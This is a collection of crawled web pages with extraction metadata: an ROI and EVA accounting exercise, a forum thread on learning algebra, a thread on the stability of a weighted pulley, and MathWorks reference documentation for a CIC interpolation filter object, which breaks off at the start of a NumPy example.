url: stringlengths 14 to 1.76k
text: stringlengths 100 to 1.02M
metadata: stringlengths 1.06k to 1.1k
https://www.transtutors.com/questions/problem-12-7-roi-and-eva-85322.htm
# Problem 12-7 ROI and EVA

Chapter 12, Problem 12-7 ROI and EVA [LO 6]

ELN Waste Management has a subsidiary that disposes of hazardous waste and a subsidiary that collects and disposes of residential garbage. Information related to the two subsidiaries follows.

| | Hazardous Waste | Residential Waste |
| --- | --- | --- |
| Total assets | $13,000,000 | $70,000,000 |
| Noninterest-bearing current liabilities | 3,000,000 | 12,000,000 |
| Net income | 1,700,000 | 6,000,000 |
| Interest expense | 1,250,000 | 7,300,000 |
| Required rate of return | 12% | 14% |
| Tax rate | 40% | 40% |

Required
a. Calculate ROI for both subsidiaries.
b. Calculate EVA for both subsidiaries. Note that since no adjustments for accounting distortions are being made, EVA is equivalent to residual income.
c. Which subsidiary has added the most to shareholder value in the last year?
d. Based on the limited information, which subsidiary is the best candidate for expansion? Explain.
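A short script makes the arithmetic easy to check. This is an illustrative sketch only, and it assumes common textbook conventions that the problem statement does not spell out: ROI = net income / total assets, NOPAT = net income + interest expense × (1 − tax rate), invested capital = total assets − noninterest-bearing current liabilities, and EVA (here equal to residual income) = NOPAT − required rate of return × invested capital. If your course defines ROI or EVA differently, adjust accordingly.

```python
# Hedged sketch: one common convention for ROI and EVA/residual income.
# The figures restate the table above; the formulas are assumptions,
# not taken verbatim from the textbook.
subsidiaries = {
    "Hazardous Waste":   dict(assets=13_000_000, nibcl=3_000_000,
                              net_income=1_700_000, interest=1_250_000,
                              required_rate=0.12, tax_rate=0.40),
    "Residential Waste": dict(assets=70_000_000, nibcl=12_000_000,
                              net_income=6_000_000, interest=7_300_000,
                              required_rate=0.14, tax_rate=0.40),
}

for name, d in subsidiaries.items():
    roi = d["net_income"] / d["assets"]                        # part a
    nopat = d["net_income"] + d["interest"] * (1 - d["tax_rate"])
    invested_capital = d["assets"] - d["nibcl"]
    eva = nopat - d["required_rate"] * invested_capital        # part b
    print(f"{name}: ROI = {roi:.2%}, EVA = ${eva:,.0f}")
```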
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4659666121006012, "perplexity": 6449.238199544912}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-34/segments/1534221218122.85/warc/CC-MAIN-20180821112537-20180821132537-00305.warc.gz"}
https://repository.ipb.ac.id/handle/123456789/78/search-filter?filtertype_0=subject&filtertype_1=subject&filtertype_2=subject&filter_relational_operator_1=equals&filtertype_3=author&filter_relational_operator_0=equals&filtertype_4=subject&filter_2=Structural+Equation+Modeling&filter_relational_operator_3=equals&filter_1=Management&filter_relational_operator_2=equals&filter_0=Services&filter_relational_operator_4=equals&filter_4=2017&filter_3=Afif%2C+Nurullah+Sururi&field=subject&order=COUNT
Now showing items 1-9 of 1 2017 (1) Bogor-JABAR (1) interaction quality (1) Management (1) outcome quality (1) physical environment quality (1) price (1) Services (1) Structural Equation Modeling (1)
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9370996356010437, "perplexity": 24926.767022875414}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-43/segments/1634323585828.15/warc/CC-MAIN-20211023224247-20211024014247-00154.warc.gz"}
http://www.msri.org/people/11603
# Mathematical Sciences Research Institute

Brian DeFacio

1. Workshop: The Feynman Integral Along with Related Topics and Applications. Dec 11, 2002 (Wednesday), 10:30 AM - 11:30 AM. "Rigorous stochastic model representation for the Wilson loop observables in Chern-Simons theory" — Atle Hahn.
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9022068381309509, "perplexity": 6899.863268751731}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-30/segments/1469257823805.20/warc/CC-MAIN-20160723071023-00318-ip-10-185-27-174.ec2.internal.warc.gz"}
http://mathhelpforum.com/algebra/199982-how-think-algebra.html
# Math Help - How to think for algebra

1. ## How to think for algebra

Hello all. So, I'm now out of college (English degree), but I work with engineers daily (I'm a technical writer). I would like to become better at algebra/calculus so that I can understand what's going on better. I was talking with my boss about how odd it was to work with engineers when I'm so bad at math, and he asked me to explain how I "see" math. Apparently I "see" it "discretely." For example, if you ask me how I see 2+2=4, I say I see 2 dots, I put 2 more dots on, and now there are 4 dots. I multiply by adding in groups. When you get to square roots and (especially) imaginary numbers, I instantly become lost because I can't see how you can do that to an object. Apparently he and the other engineers on staff see numbers on a continuous line, and there are rules you use to manipulate things on this line. So they see 2+2=4 by actually going up this line. There are many lines that relate to this main number line, and that is where imaginary numbers apparently come in (I may be butchering what he said; it quickly got beyond me). I don't know if this helps or not, but as horrible as I was at algebra, I was GREAT at geometry. I'm also great at memorization, literature, philosophy, and other humanities (except I can't draw or paint to save my life). I can discuss all sorts of abstract philosophical questions, but when it comes to math, if I can't see it, I can't do it. What I want to know is whether there is a way I can teach myself to think of math on these lines instead of always having to have a concrete object to manipulate. If I could lose the dependency on working with a concrete object, maybe I could teach myself algebra again and understand these complex ideas that you cannot tangibly do to an object, but that in theory can be used to reach tangible results. Sorry if I didn't make myself clear. I have not studied any math in years. I loved it in elementary school (I can still multiply 3-digit numbers in my head), but once we got into algebra, it was like hitting a brick wall. Now I'm trying to tear that wall down.

2. ## Re: How to think for algebra

Here is a good place to start ... Resource: Algebra: In Simplest Terms

3. ## Re: How to think for algebra

I'm not a wizard at all when it comes to advanced math, complex formulas, and the like, although I am always eager to learn new things and acquire new knowledge. At school I was never too good with math, mainly because it all seemed so abstract and had no root in the real world. But when designing and programming computer games I overcame and understood many concepts and mathematical functions, because I had specific scenarios to work with which interested me. I can say that I learned more about math and number manipulation from game design and programming than I ever did at school (if I'm not exaggerating slightly). When I think about specific math and number problems (and almost anything else) I tend to see them as systems rather than as a process, and for me that helps. I'm sorry for not being able to help you much, but I recently learned about imaginary numbers and the complex number system. I don't know your level of knowledge, but I can highly recommend reading this; it will definitely help you understand the complex number system (imaginary numbers) along with many of the major number systems: Answers and Explanations -- Do "Imaginary Numbers" Really Exist? It's short and easy to read.

4. 
## Re: How to think for algebra You have already been given some good advice, but just let me add that if you think Code: .. + .. = .... you are right; it's nothing to be ashamed of. Two rocks plus two rocks gives four rocks. But when you begin to deal with fractions it gets more complicated, and that's when you need the number line. Some numbers can't even be represented as whole fractions (shocking!), but they fit on the number line. Khan academy has a good reputation, is online and is free. Khan Academy (Haven't tried it myself, at least not much.)
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6946517825126648, "perplexity": 807.4145152599708}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-48/segments/1448398456975.30/warc/CC-MAIN-20151124205416-00320-ip-10-71-132-137.ec2.internal.warc.gz"}
http://mathhelpforum.com/advanced-applied-math/14513-rotation-weighted-pulley.html
# Thread: rotation of a weighted pulley

1. ## rotation of a weighted pulley

A light wheel of radius a has a uniform semicircular rim of mass M, and may rotate freely in a vertical plane about a horizontal axis through its center. A light string passes around the wheel and suspends a mass m. The system is governed by the equation:

(M+m)a^2 (d^2(x)/dt^2) = a*g*(m - (2*M*sin(x))/pi)

where x is the angle between the downward vertical and the diameter through the center of mass of the heavy rim. Find the equilibrium points and the conditions for their existence and stability. Let k = m/M. How does the wheel behave when k is large?

-----------------

I have some thoughts on the problem, but I am not sure if they are right: I think when k is large, d^2(x)/dt^2 tends to g/a, which means the wheel behaves like a simple pendulum?? And one of the equilibrium points is, of course, (k,x) = (0,0); then (0, pi) and (0, 2*pi) are equilibrium points as well. Another observation is that when k = 2/pi, sin(x) = 1. I think bifurcation occurs here, but I am not sure what would happen when k > 2/pi, because it seems like that means sin(x) > 1...

2. Originally Posted by totoro (the problem statement above)

At the equilibrium points all the derivatives of x are zero, so:

m = 2*M*sin(x)/pi, or: sin(x) = (pi/2) m/M.

Now m and M are both positive, and we want x in the range [0, 2 pi), so

x = arcsin((pi/2) m/M), and x = pi - arcsin((pi/2) m/M),

and there are no real solutions unless (pi/2)(m/M) <= 1. Or in terms of k: for equilibrium points to exist, k <= 2/pi, and they are:

x = arcsin((pi/2) k), and x = pi - arcsin((pi/2) k).

RonL

3. Thanks! So given these fixed points, I have yet to determine their stability. With only the equation for the second derivative, how can I determine the stability of the fixed points? Also, I need to find out where the bifurcation occurs and what type it is. I don't know if there is a point, i.e. a value of k, such that the two fixed points found would coalesce into one (tangent bifurcation)? Or is it another type of bifurcation?

4. Originally Posted by totoro: Thanks! So given these fixed points, I have yet to determine their stability. With only the equation for the second derivative, how can I determine the stability of the fixed points?
If x0 is one of the equilibrium points, we consider a solution which starts nearby, say x(t) = x0 + epsilon(t), x'(0) = 0, where epsilon(t) is "small". Then:

(M+m)a^2 (d^2(x)/dt^2) ~= a*g*(m - (2M/pi)[sin(x0) + epsilon(t)*cos(x0)])

which may be written:

A d^2(epsilon)/dt^2 ~= K1 + K2*epsilon(t) ..................(1)

where:

K1 = a*g*(m - (2M/pi)*sin(x0))  (note that K1 = 0 at an equilibrium)
K2 = -a*g*(2M/pi)*cos(x0)
A = (M+m)a^2

Then the equilibrium x0 is stable if the solution of (1) is bounded (by some multiple of epsilon(0)) for all t > 0, for sufficiently small epsilon(0) > 0.

Originally Posted by totoro: Also I need to find out where the bifurcation occurs and what type it is. I don't know if there is a point, i.e. a value of k, such that the two fixed points found would coalesce into one (tangent bifurcation)? Or is it another type of bifurcation?

They coalesce when k = 2/pi, as then (pi/2) m/M = 1 and the two solutions for the equilibrium x's are equal (both equal pi/2).

RonL
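The analysis above can be sanity-checked numerically. The following is an illustrative Python sketch (not from the thread): the parameter values M = 1 and k = 0.5 are arbitrary choices, and stability is judged from the sign of the linearized coefficient, i.e. the sign of -(2M/pi)*cos(x0), consistent with the linearization given above.

```python
import math

# Illustrative check of the thread's equilibrium/stability analysis.
M, k = 1.0, 0.5          # rim mass and ratio k = m/M (assumed values)
m = k * M

if (math.pi / 2) * k > 1:
    print("No equilibria: k exceeds 2/pi")
else:
    x1 = math.asin((math.pi / 2) * k)   # first equilibrium, in [0, pi/2]
    x2 = math.pi - x1                   # second equilibrium, in [pi/2, pi]
    for x0 in (x1, x2):
        # Linearize the RHS a*g*(m - (2M/pi) sin x) about x0:
        # the coefficient of epsilon is proportional to -(2M/pi) cos(x0).
        coeff = -(2 * M / math.pi) * math.cos(x0)
        kind = "stable (bounded oscillation)" if coeff < 0 else "unstable"
        print(f"x0 = {x0:.4f} rad: linearized coefficient {coeff:+.4f} -> {kind}")
```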
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9620354771614075, "perplexity": 934.6006009375182}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794867374.98/warc/CC-MAIN-20180526073410-20180526093410-00639.warc.gz"}
https://nl.mathworks.com/help/dsp/ref/dsp.cicinterpolator-system-object.html
# dsp.CICInterpolator Interpolate signal using cascaded integrator-comb filter ## Description The dsp.CICInterpolator System object™ interpolates an input signal using a cascaded integrator-comb (CIC) interpolation filter. The CIC interpolation filter structure consists of N sections of cascaded comb filters, followed by a rate change by a factor of R, followed by N sections of cascaded integrators. For details, see Algorithms. The NumSections property specifies N, the number of sections in the CIC filter. The InterpolationFactor property specifies R, the interpolation factor. The getFixedPointInfo function returns the word lengths and fraction lengths of the fixed-point sections and the output for the dsp.CICInterpolator System object. You can also generate HDL code for this System object using the generatehdl function. Note This object requires a Fixed-Point Designer™ license. To interpolate a signal using a CIC filter: 1. Create the dsp.CICInterpolator object and set its properties. 2. Call the object with arguments, as if it were a function. ## Creation ### Description example cicInterp = dsp.CICInterpolator creates a CIC interpolation System object that applies a CIC interpolation filter to the input signal. example cicInterp = dsp.CICInterpolator(R,M,N) creates a CIC interpolation object with the InterpolationFactor property set to R, the DifferentialDelay property set to M, and the NumSections property set to N. cicInterp = dsp.CICInterpolator(Name,Value) creates a CIC interpolation object with each specified property set to the specified value. Enclose each property name in single quotes. You can use this syntax with any previous input argument combinations. ## Properties expand all Unless otherwise indicated, properties are nontunable, which means you cannot change their values after calling the object. Objects lock when you call them, and the release function unlocks them. If a property is tunable, you can change its value at any time. Factor by which the input signal is interpolated, specified as a positive integer. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Differential delay value used in each of the comb sections of the filter, specified as a positive integer. For details, see Algorithms. If the differential delay is of built-in integer class data type, the interpolation factor must be the same integer data type or double. For example, if the differential delay is an int8, then the interpolation factor must be an int8 or double. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Number of integrator and comb sections of the CIC filter, specified as a positive integer. This number indicates the number of sections in either the comb part or the integrator part of the filter. The total number of sections in the CIC filter is twice the number of sections given by this property. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Fixed-point property designations, specified as one of the following: • Full precision – The word length and fraction length of the CIC filter sections and the object output operate in full precision. • Minimum section word lengths – Specify the output word length through the OutputWordLength property. The object determines the filter section data type and the output fraction length that give the best possible precision. For details, see getFixedPointInfo and cicInterpOut argument. 
• Specify word lengths – Specify the word lengths of the CIC filter sections and the object output through the SectionWordLengths and OutputWordLength properties. The object determines the corresponding fraction lengths to give the best possible precision. For details, see getFixedPointInfo and the cicInterpOut argument. • Specify word and fraction lengths – Specify the word length and fraction length of the CIC filter sections and the object output through the SectionWordLengths, SectionFractionLengths, OutputWordLength, and OutputFractionLength properties. Fixed-point word lengths to use for each filter section, specified as a scalar or a row vector of integers. The word length must be greater than or equal to 2. If you specify a scalar, the value applies to all the sections of the filter. If you specify a vector, the vector must be of length 2 × NumSections. Example: 32 Example: [32 32 32 32] #### Dependencies This property applies when you set the FixedPointDataType property to 'Specify word lengths' or 'Specify word and fraction lengths'. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Fixed-point fraction lengths to use for each filter section, specified as a scalar or a row vector of integers. The fraction length can be negative, 0, or positive. If you specify a scalar, the value applies to all the sections of the filter. If you specify a vector, the vector must be of length 2 × NumSections. Example: -2 Example: [-2 0 5 8] #### Dependencies This property applies when you set the FixedPointDataType property to 'Specify word and fraction lengths'. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Fixed-point word length to use for the filter output, specified as a scalar integer greater than or equal to 2. #### Dependencies This property applies when you set the FixedPointDataType property to one of 'Minimum section word lengths', 'Specify word lengths', or 'Specify word and fraction lengths'. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 Fixed-point fraction length to use for the filter output, specified as a scalar integer. #### Dependencies This property applies when you set the FixedPointDataType property to 'Specify word and fraction lengths'. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 ## Usage ### Description example cicInterpOut = cicInterp(input) interpolates the input using a CIC interpolator. ### Input Arguments expand all Data input, specified as a vector or matrix. If the input is of single or double data type, property settings related to the fixed-point data types are ignored. Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 | fi Complex Number Support: Yes ### Output Arguments expand all Interpolated output, returned as a vector or a matrix. The output frame size equals (InterpolationFactor) × input frame size. The complexity of the output data matches that of the input data. If the input is single or double, the output data type matches the input data type. If the input is of built-in integer data type or of fixed-point data type, the output word length and fraction length depend on the fixed-point data type setting you choose through the FixedPointDataType property. 
Full precision When the FixedPointDataType property is set to 'Full precision', the following relationship applies: $\begin{array}{l}W{L}_{\text{output}}=W{L}_{\text{input}}+NumSect\\ F{L}_{\text{output}}=F{L}_{\text{input}}\end{array}$ where, • WLoutput –– Word length of the output data. • FLoutput –– Fraction length of the output data. • WLinput –– Word length of the input data. • FLinput –– Fraction length of the input data. • NumSect –– Number of sections in the CIC filter specified through the NumSections property. WLinput and FLinput are inherited from the data input you pass to the object algorithm. For built-in integer inputs, the fraction length is 0. Minimum section word lengths When the FixedPointDataType property is set to 'Minimum section word lengths', the output word length is the value you specify in OutputWordLength property. The output fraction length, FLoutput is given by the following equation: $F{L}_{\text{output}}=W{L}_{\text{output}}-\left(W{L}_{\text{input}}-F{L}_{\text{input}}+NumSect\right)$ Specify word and fraction lengths When the FixedPointDataType is set to 'Specify word and fraction lengths', the output word length and fraction length are the values you specify in the OutputWordLength and OutputFractionLength properties. Specify word lengths When the FixedPointDataType is set to 'Specify word lengths', the output word length is the value you specify in the OutputWordLength property. The output fraction length, FLoutput is given by the following equation: $F{L}_{\text{output}}=W{L}_{\text{output}}-\left(W{L}_{\text{input}}-F{L}_{\text{input}}+NumSect\right)$ Data Types: single | double | int8 | int16 | int32 | int64 | uint8 | uint16 | uint32 | uint64 | fi Complex Number Support: Yes ## Object Functions To use an object function, specify the System object as the first input argument. For example, to release system resources of a System object named obj, use this syntax: release(obj) expand all generatehdl Generate HDL code for quantized DSP filter (requires Filter Design HDL Coder) impz Impulse response of discrete-time filter System object freqz Frequency response of discrete-time filter System object phasez Phase response of discrete-time filter System object (unwrapped) fvtool Visualize frequency response of DSP filters gain Gain of CIC filter System object getFixedPointInfo Get fixed-point word and fraction lengths info Information about filter System object step Run System object algorithm release Release resources and allow changes to System object property values and input characteristics reset Reset internal states of System object For a list of filter analysis methods this object supports, type dsp.CICInterpolator.helpFilterAnalysis in the MATLAB® command prompt. For the corresponding function reference pages, see Analysis Methods for Filter System Objects. ## Examples collapse all Note: If you are using R2016a or an earlier release, replace each call to the object with the equivalent step syntax. For example, obj(x) becomes step(obj,x). Create a dsp.CICInterpolator System object™ with InterpolationFactor set to 2. Interpolate a fixed-point signal by a factor of 2 from 22.05 kHz to 44.1 kHz. cicint = dsp.CICInterpolator(2) cicint = dsp.CICInterpolator with properties: InterpolationFactor: 2 DifferentialDelay: 1 NumSections: 2 FixedPointDataType: 'Full precision' Create a dsp.SineWave object with SampleRate set to 22.05 kHz, SamplesPerFrame set to 32, and OutputDataType set to 'Custom'. 
To generate a fixed-point signal, set the CustomOutputDataType property to a numerictype object. For the purpose of this example, set the value to numerictype([],16). The fraction length is computed based on the values of the generated sinusoidal signal to give the best possible precision. To generate a fixed-point signal, set the Method property of the dsp.SineWave object to 'Table lookup'. This method of generating the sinusoidal signal requires that the period of every sinusoid in the output be evenly divisible by the sample period. That is, $1/{\mathit{f}}_{\mathit{i}}{\mathit{T}}_{\mathit{s}}={\mathit{k}}_{\mathit{i}}$ must be an integer value for every channel i = 1, 2, ..., N. The value of ${\mathit{T}}_{\mathit{s}}$ equals $1/{\mathit{F}}_{\mathit{s}}$, the variable ${\mathit{f}}_{\mathit{i}}$ is the frequency of the sinusoidal signal, and ${\mathit{F}}_{\mathit{s}}$ is the sample rate of the signal. In other words, the ratio ${\mathit{F}}_{\mathit{s}}/{\mathit{f}}_{\mathit{i}}$ must be an integer. For more details, see the Algorithms section on the dsp.SineWave object page. In this example, ${\mathit{F}}_{\mathit{s}}$ is set to 22050 Hz and ${\mathit{f}}_{\mathit{i}}$ is set to 1050 Hz. Fs = 22.05e3; sine = dsp.SineWave('Frequency',1050,'SampleRate',Fs,'SamplesPerFrame',32,... 'Method','Table lookup','OutputDataType','Custom') sine = dsp.SineWave with properties: Amplitude: 1 Frequency: 1050 PhaseOffset: 0 ComplexOutput: false Method: 'Table lookup' TableOptimization: 'Speed' SampleRate: 22050 SamplesPerFrame: 32 OutputDataType: 'Custom' Show all properties In each loop of the iteration, stream in a frame of the fixed-point sinusoidal signal sampled at 22.05 kHz. Interpolate the streamed signal by a factor of 2. The interpolated output has 64 samples per frame. for i = 1:16 x = sine(); y = cicint(x); end The output of the CIC interpolation filter is amplified by a specific gain value. You can determine this value using the gain function. This gain equals the gain of the $2{\mathit{N}}^{\mathrm{th}}$ stage of the CIC interpolation filter and equals ${\left(\mathit{I}×\mathit{D}\right)}^{\mathit{N}}/\mathit{I}$, where $\mathit{I}$ is the interpolation factor, $\mathit{D}$ is the differential delay, and $\mathit{N}$ is the number of sections of the CIC interpolator. gainCIC = gain(cicint) gainCIC = 2 To adjust this amplified output and to match it to the amplitude of the original signal, divide the CIC interpolated signal with the computed gain value. Compare the last frames of the original and the interpolated signals. While plotting, account for the output latency of 2 samples. n = (0:63)'; stem(n(1:31)/Fs, double(x(1:31)),'r','filled') hold on; I = cicint.InterpolationFactor; stem(n(1:61)/(Fs*I), ... double(y(4:end))/gainCIC,'b') xlabel('Time (sec)') ylabel('Signal Amplitude') legend('Original Signal','Interpolated Signal',... 'location','north') hold off; Using the info function in the 'long' format, obtain the word lengths and fraction lengths of the fixed-point filter sections and the filter output. 
info(cicint,'long') ans = 'Discrete-Time FIR Multirate Filter (real) ----------------------------------------- Filter Structure : Cascaded Integrator-Comb Interpolator Interpolation Factor : 2 Differential Delay : 1 Number of Sections : 2 Stable : Yes Linear Phase : Yes (Type 1) Implementation Cost Number of Multipliers : 0 Number of States : 4 Multiplications per Input Sample : 0 Additions per Input Sample : 6 Fixed-Point Info Section word lengths : 17 17 17 17 Section fraction lengths : 14 14 14 14 Output word length : 17 Output fraction length : 14 ' Using the getFixedPointInfo function, you can determine the word lengths and fraction lengths of the fixed-point sections and the output of the dsp.CICDecimator and dsp.CICInterpolator System objects. The data types of the filter sections and the output depend on the FixedPointDataType property of the filter System object™. Full precision Create a dsp.CICDecimator object. The default value of the NumSections property is 2. This value indicates that there are two integrator and comb sections. The WLs and FLs vectors returned by the getFixedPointInfo function contain five elements each. The first two elements represent the two integrator sections. The third and fourth elements represent the two comb sections. The last element represents the filter output. cicD = dsp.CICDecimator cicD = dsp.CICDecimator with properties: DecimationFactor: 2 DifferentialDelay: 1 NumSections: 2 FixedPointDataType: 'Full precision' By default, the FixedPointDataType property of the object is set to 'Full precision'. Calling the getFixedPointInfo function on this object with the input numeric type, nt, yields the following word length and fraction length vectors. nt = numerictype(1,16,15) nt = DataTypeMode: Fixed-point: binary point scaling Signedness: Signed WordLength: 16 FractionLength: 15 [WLs,FLs] = getFixedPointInfo(cicD,nt) %#ok WLs = 1×5 18 18 18 18 18 FLs = 1×5 15 15 15 15 15 For details on how the word lengths and fraction lengths are computed, see the description for Output Arguments. If you lock the cicD object by passing an input to its algorithm, you do not need to pass the nt argument to the getFixedPointInfo function. input = int64(randn(8,1)) input = 8x1 int64 column vector 1 2 -2 1 0 -1 0 0 output = cicD(input) output=4×1 object 0 1 3 0 DataTypeMode: Fixed-point: binary point scaling Signedness: Signed WordLength: 66 FractionLength: 0 [WLs,FLs] = getFixedPointInfo(cicD) %#ok WLs = 1×5 66 66 66 66 66 FLs = 1×5 0 0 0 0 0 The output and section word lengths are the sum of input word length, 64 in this case, and the number of sections, 2. The output and section fraction lengths are 0 since the input is a built-in integer. Minimum section word lengths Release the object and change the FixedPointDataType property to 'Minimum section word lengths'. Determine the section and output fixed-point information when the input is fixed-point data, fi(randn(8,2),1,24,15). 
release(cicD); cicD.FixedPointDataType = 'Minimum section word lengths' cicD = dsp.CICDecimator with properties: DecimationFactor: 2 DifferentialDelay: 1 NumSections: 2 FixedPointDataType: 'Minimum section word lengths' OutputWordLength: 32 inputF = fi(randn(8,2),1,24,15) inputF=8×2 object 3.5784 -0.1241 2.7694 1.4897 -1.3499 1.4090 3.0349 1.4172 0.7254 0.6715 -0.0630 -1.2075 0.7148 0.7172 -0.2050 1.6302 DataTypeMode: Fixed-point: binary point scaling Signedness: Signed WordLength: 24 FractionLength: 15 [WLs, FLs] = getFixedPointInfo(cicD,numerictype(inputF)) %#ok WLs = 1×5 26 26 26 26 32 FLs = 1×5 15 15 15 15 21 Specify word and fraction lengths Change the FixedPointDataType property to 'Specify word and fraction lengths'. Determine the fixed-point information using the getFixedPointInfo function. cicD.FixedPointDataType = 'Specify word and fraction lengths' cicD = dsp.CICDecimator with properties: DecimationFactor: 2 DifferentialDelay: 1 NumSections: 2 FixedPointDataType: 'Specify word and fraction lengths' SectionWordLengths: [16 16 16 16] SectionFractionLengths: 0 OutputWordLength: 32 OutputFractionLength: 0 [WLs, FLs] = getFixedPointInfo(cicD,numerictype(inputF)) %#ok WLs = 1×5 16 16 16 16 32 FLs = 1×5 0 0 0 0 0 The section and output word lengths and fraction lengths are assigned as per the respective fixed-point properties of the cicD object. These values are not determined by the input numeric type. To confirm, call the getFixedPointInfo function without passing the numerictype input argument. [WLs, FLs] = getFixedPointInfo(cicD) %#ok WLs = 1×5 16 16 16 16 32 FLs = 1×5 0 0 0 0 0 Specify word lengths To specify the word lengths of the filter section and output, set the FixedPointDataType property to 'Specify word lengths'. cicD.FixedPointDataType = 'Specify word lengths' cicD = dsp.CICDecimator with properties: DecimationFactor: 2 DifferentialDelay: 1 NumSections: 2 FixedPointDataType: 'Specify word lengths' SectionWordLengths: [16 16 16 16] OutputWordLength: 32 The getFixedPointInfo function requires the input numeric type because that information is used to compute the section and word fraction lengths. [WLs, FLs] = getFixedPointInfo(cicD,numerictype(inputF)) WLs = 1×5 16 16 16 16 32 FLs = 1×5 5 5 5 5 21 For more details on how the function computes the word and fraction lengths, see the description for Output Arguments. expand all expand all ## References [1] Hogenauer, E.B. "An Economical Class of Digital Filters for Decimation and Interpolation." IEEE Transactions on Acoustics, Speech and Signal Processing. Volume 29, Number 2, 1981, 155–162. [2] Meyer-Baese, U. Digital Signal Processing with Field Programmable Gate Arrays. New York: Springer, 2001. [3] Harris, Fredric J. Multirate Signal Processing for Communication Systems. Indianapolis, IN: Prentice Hall PTR, 2004. ## Extended Capabilities ### Topics Introduced in R2012a Watch now
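For intuition about the filter structure described at the top of this reference page — N comb sections, a rate change by a factor of R, then N integrator sections — here is a small floating-point sketch in NumPy. It is only a conceptual model, not the dsp.CICInterpolator System object: it ignores fixed-point word lengths entirely, and the parameter names R, M, and N simply mirror the properties above. For R = 2, M = 1, N = 2 its overall gain, (R·M)^N / R, matches the value of 2 returned by the gain function in the example.

```python
import numpy as np

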